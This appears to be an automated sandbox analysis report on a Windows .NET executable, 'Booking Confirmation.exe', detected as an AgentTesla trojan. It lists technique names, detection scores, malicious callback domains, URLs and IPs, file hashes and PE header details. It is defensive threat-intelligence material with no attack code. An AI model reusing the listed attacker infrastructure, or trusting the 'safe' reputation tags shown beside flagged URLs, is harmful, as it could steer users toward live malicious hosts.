External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information31	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing13	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Booking Confirmation.exe	33%	ReversingLabs	Win32.Trojan.AgentTesla
Booking Confirmation.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.Booking Confirmation.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.sajatypeworks.comt	0%	URL Reputation	safe
http://www.sajatypeworks.comt	0%	URL Reputation	safe
http://www.sajatypeworks.comt	0%	URL Reputation	safe
http://www.buehne.cloud/ffw/?MZg8=i2wbx/M7rrWGhnBeYdMUQ+oEsm11dU48NWkvE2U6RCUjjqrjMq6tqVdU8V2lO/H9m4oS&uTxXc=ojO0dJK0Hv	0%	Avira URL Cloud	safe
http://www.sajatypeworks.coms	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://en.w	0%	URL Reputation	safe
http://en.w	0%	URL Reputation	safe
http://en.w	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cnE	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cnht	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
www.evolvekitchendesign.com/ffw/	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.tiro.comym	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.carterandcone.como.	0%	URL Reputation	safe
http://www.carterandcone.como.	0%	URL Reputation	safe
http://www.carterandcone.como.	0%	URL Reputation	safe
http://www.sajatypeworks.come	0%	URL Reputation	safe
http://www.sajatypeworks.come	0%	URL Reputation	safe
http://www.sajatypeworks.come	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.praktijkinfinity.online/ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&uTxXc=ojO0dJK0Hv	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.localmoversuae.com	156.227.187.201	true	true	unknown
www.praktijkinfinity.online	185.175.200.247	true	true	unknown
buehne.cloud	81.169.149.11	true	true	unknown
merzigomusic.com	34.102.136.180	true	true	unknown
www.buehne.cloud	unknown	unknown	true	unknown
www.merzigomusic.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.buehne.cloud/ffw/?MZg8=i2wbx/M7rrWGhnBeYdMUQ+oEsm11dU48NWkvE2U6RCUjjqrjMq6tqVdU8V2lO/H9m4oS&uTxXc=ojO0dJK0Hv	true	Avira URL Cloud: safe	unknown
www.evolvekitchendesign.com/ffw/	true	Avira URL Cloud: safe	low
http://www.praktijkinfinity.online/ffw/?MZg8=QtqTw2GyYxf2WyRFtpmSmJJvhnrw03uNROtSydYnJk3JDRiYk6bsvXWgtuf5tlEJcMN+&uTxXc=ojO0dJK0Hv	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.comt	Booking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.coms	Booking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	Booking Confirmation.exe, 00000000.00000002.670983591.0000000002591000.00000004.00000001.sdmp	false		high
http://en.w	Booking Confirmation.exe, 00000000.00000003.650111317.0000000005725000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coml	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cnE	Booking Confirmation.exe, 00000000.00000003.652141962.0000000005728000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	Booking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmp, Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/	Booking Confirmation.exe, 00000000.00000003.652141962.0000000005728000.00000004.00000001.sdmp, Booking Confirmation.exe, 00000000.00000003.652187363.0000000005726000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cnht	Booking Confirmation.exe, 00000000.00000003.651858652.000000000572E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netD	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn	Booking Confirmation.exe, 00000000.00000003.652141962.0000000005728000.00000004.00000001.sdmp, Booking Confirmation.exe, 00000000.00000003.651977805.0000000005727000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	explorer.exe, 00000006.00000002.914045803.0000000002B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.tiro.comym	Booking Confirmation.exe, 00000000.00000003.651298106.000000000573B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.como.	Booking Confirmation.exe, 00000000.00000003.653249672.0000000005728000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sajatypeworks.come	Booking Confirmation.exe, 00000000.00000003.649430535.0000000005723000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	Booking Confirmation.exe, 00000000.00000002.676021745.0000000006932000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.695698069.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
81.169.149.11	unknown	Germany	6724	STRATOSTRATOAGDE	true
156.227.187.201	unknown	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true
185.175.200.247	unknown	Netherlands	48635	ASTRALUSNL	true

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356529
Start date:	23.02.2021
Start time:	09:35:52
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 13s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Booking Confirmation.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@9/1@4/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 15.7% (good quality ratio 13.9%) Quality average: 71.4% Quality standard deviation: 32%
HCA Information:	Successful, ratio: 100% Number of executed functions: 79 Number of non-executed functions: 150
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.43.139.144, 51.104.139.180, 52.255.188.83, 104.42.151.234, 92.122.145.220, 40.88.32.150, 52.147.198.201, 13.64.90.137, 93.184.221.240, 52.155.217.156, 20.54.26.129, 92.122.213.247, 92.122.213.194, 51.11.168.160 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size getting too big, too many NtAllocateVirtualMemory calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/356529/sample/Booking Confirmation.exe

Simulations

Behavior and APIs

Time	Type	Description
09:36:48	API Interceptor	1x Sleep call for process: Booking Confirmation.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
POWERLINE-AS-APPOWERLINEDATACENTERHK	lpdKSOB78u.exe	Get hash	malicious	Browse	154.213.108.250
	4pFzkB6ePK.exe	Get hash	malicious	Browse	154.201.205.155
	NewOrder.xlsm	Get hash	malicious	Browse	154.201.205.155
	Order83930.exe	Get hash	malicious	Browse	154.215.106.100
	RFQ for Marjan Development Program.exe	Get hash	malicious	Browse	154.86.32.52
	ForeignRemittance_20210219_USD.xlsx	Get hash	malicious	Browse	156.227.188.203
	SHED.EXE	Get hash	malicious	Browse	154.213.100.41
	wFzMy6hehS.exe	Get hash	malicious	Browse	192.151.233.118
	INCHAP_Invoice_21.xlsx	Get hash	malicious	Browse	192.151.233.118
	ffOWE185KP.exe	Get hash	malicious	Browse	192.151.233.118
	mWxzYlRCUi.exe	Get hash	malicious	Browse	192.151.233.118
	Cargo_remitP170201.xlsx	Get hash	malicious	Browse	192.151.233.118
	quotations pdf.exe	Get hash	malicious	Browse	156.243.221.75
	Project.pdf.exe	Get hash	malicious	Browse	154.213.241.19
	order pdf.exe	Get hash	malicious	Browse	156.252.99.134
	YCVj3q7r5e.exe	Get hash	malicious	Browse	192.151.255.12
	th520.exe	Get hash	malicious	Browse	103.75.46.74
	DHL Parcel Details.xlsx	Get hash	malicious	Browse	154.216.241.144
	DCSGROUP.xlsx	Get hash	malicious	Browse	160.124.66.18
	purchase order doc.exe	Get hash	malicious	Browse	154.201.177.118
STRATOSTRATOAGDE	PO 20211602.xlsm	Get hash	malicious	Browse	81.169.145.88
	ZRz0Aq1Rf0.dll	Get hash	malicious	Browse	81.169.181.88
	Io8ic2291n.doc	Get hash	malicious	Browse	85.214.26.7
	gSvUGC0OzV.exe	Get hash	malicious	Browse	81.169.145.90
	DHL Documents_AWB_001173980920AD.xlsx	Get hash	malicious	Browse	81.169.145.143
	nzGUqSK11D.exe	Get hash	malicious	Browse	85.214.228.140
	FastClient_i_r756196528.exe	Get hash	malicious	Browse	85.214.219.2
	PO210121.exe	Get hash	malicious	Browse	81.169.145.90
	_RFQ_MVSEASAIL_34.xlsx	Get hash	malicious	Browse	81.169.145.68
	0iEsxw3D7A.exe	Get hash	malicious	Browse	81.169.145.143
	2021_50SG0BK00T1,pdf.exe	Get hash	malicious	Browse	81.169.145.150
	6gg4UwrN3I.exe	Get hash	malicious	Browse	81.169.145.82
	RFV9099311042.exe	Get hash	malicious	Browse	81.169.145.64
	MR727043761.doc	Get hash	malicious	Browse	81.169.145.175
	SecuriteInfo.com.VB.Trojan.Downloader.JVAZ.20129.doc	Get hash	malicious	Browse	81.169.145.175
	SecuriteInfo.com.Mal.DocDl-K.8726.doc	Get hash	malicious	Browse	81.169.145.175
	LX0950180213.doc	Get hash	malicious	Browse	81.169.145.175
	5j6RsnL8zx.exe	Get hash	malicious	Browse	81.169.145.143
	099898892.exe	Get hash	malicious	Browse	81.169.145.74
	H56P7iDwnJ.doc	Get hash	malicious	Browse	81.169.145.152

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Booking Confirmation.exe.log Download File
Process:	C:\Users\user\Desktop\Booking Confirmation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1406
Entropy (8bit):	5.341099307467139
Encrypted:	false
SSDEEP:	24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
MD5:	E5FA1A53BA6D70E18192AF6AF7CFDBFA
SHA1:	1C076481F11366751B8DA795C98A54DE8D1D82D5
SHA-256:	1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
SHA-512:	77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.457054361780353
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Booking Confirmation.exe
File size:	510976
MD5:	78d9eadc9fcc580239b360ffa2c2220f
SHA1:	2bc313ca573a9be005aa8d22e96601c10dcd5041
SHA256:	e836c2aecd7a2ae83a5bb088780d9e7b8cd6c3a7ff6b9c3f1261bfd1f53dbef7
SHA512:	60858a1b0c966c7e2bbc5b4a86ca0023da5d4bf8d68331c8290e9a57d97e14e5c50d26bca22461301bdcbdd48ac85b2652fb0545931a43ebe0a497dd115a5c3d
SSDEEP:	12288:guB7EQbDmPXvcNGIdjKD8WMxSNyPww1rqGGRzacQA+xE6:r7EQOPQdW85yyx1eRLQLT
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G4`..............P.................. ........@.. ....................... ............@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x47d6ee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x60344790 [Tue Feb 23 00:08:48 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7d69c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7e000	0xff8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x80000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x7b6f4	0x7b800	False	0.765528134489	data	7.4686220922	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
